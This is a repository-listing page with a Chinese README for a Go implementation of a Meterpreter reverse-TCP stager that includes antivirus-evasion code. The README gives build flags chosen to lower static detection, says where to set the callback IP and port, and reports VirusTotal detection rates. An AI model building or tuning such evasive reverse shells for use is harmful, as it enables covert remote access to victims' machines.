https://github.com/insightglacier/go_meterpreter
Golang实现的x86下的Meterpreter reverse tcp
https://github.com/insightglacier/go_meterpreter
bypass-antivirus golang meterpreter
Last synced: 6 months ago
JSON representation
Golang实现的x86下的Meterpreter reverse tcp
- Host: GitHub
- URL: https://github.com/insightglacier/go_meterpreter
- Owner: insightglacier
- Created: 2020-02-22T14:21:36.000Z (over 5 years ago)
- Default Branch: master
- Last Pushed: 2020-02-23T04:38:31.000Z (over 5 years ago)
- Last Synced: 2025-04-13T22:08:51.114Z (6 months ago)
- Topics: bypass-antivirus, golang, meterpreter
- Language: Go
- Homepage:
- Size: 8.79 KB
- Stars: 39
- Watchers: 2
- Forks: 8
- Open Issues: 0
-
Metadata Files:
- Readme: README.md
Awesome Lists containing this project
README
# go_meterpreter
Golang实现的x86下的Meterpreter reverse tcp
做静态免杀实验,代码修改自[EGESPLOIT](https://github.com/EgeBalci/EGESPLOIT) 这个开源项目。单独实现主要在于减小程序编译后体积。目前编译后的大小在1.2M左右。
## 使用方法
修改go_meterpreter.go中125行代码 s := "http://192.168.121.131:8989" IP和端口修改为自己的地址。然后就可以go build了。
'''
set GOARCH=386
go build -ldflags="-H windowsgui -w"
'''
注意上面参数中没有-s,因为实际测试,使用这种方式build后的程序免杀效果会好一些。如果直接go build,程序会有窗口,同时大小也在1.6M左右。
由于加入了这部分代码,运行后因为执行多次无用代码,需要等一会才可以看到上线。另外目前会出现连接两次msf的情况,但是只有一个连接会返回shell,目前没找到原因。
## 免杀效果
加入了Bypass AV的代码。
我在刚写好的时候上传到VT,查杀结果位8/62。VT上有超过70个引擎,62个应该是加入BypassAV代码起的作用。
今天最新经过编译查杀结果为20/70。由于现在杀毒都有云查杀,刚写的时候效果好,但是过几天就被被杀。这里具体可以结合一些其他方式来尝试绕过。
VT检测结果地址:[https://www.virustotal.com/gui/file/f8ff4acac418e6cdc326d0139ba2bdb9fce32558985962cf8303fcc97b9e47fb/detection](https://www.virustotal.com/gui/file/f8ff4acac418e6cdc326d0139ba2bdb9fce32558985962cf8303fcc97b9e47fb/detection)
在使用这个的过程中,Windows10中自带的杀毒软件会拦截。会被动态行为发现。这里仅是过静态查杀测试。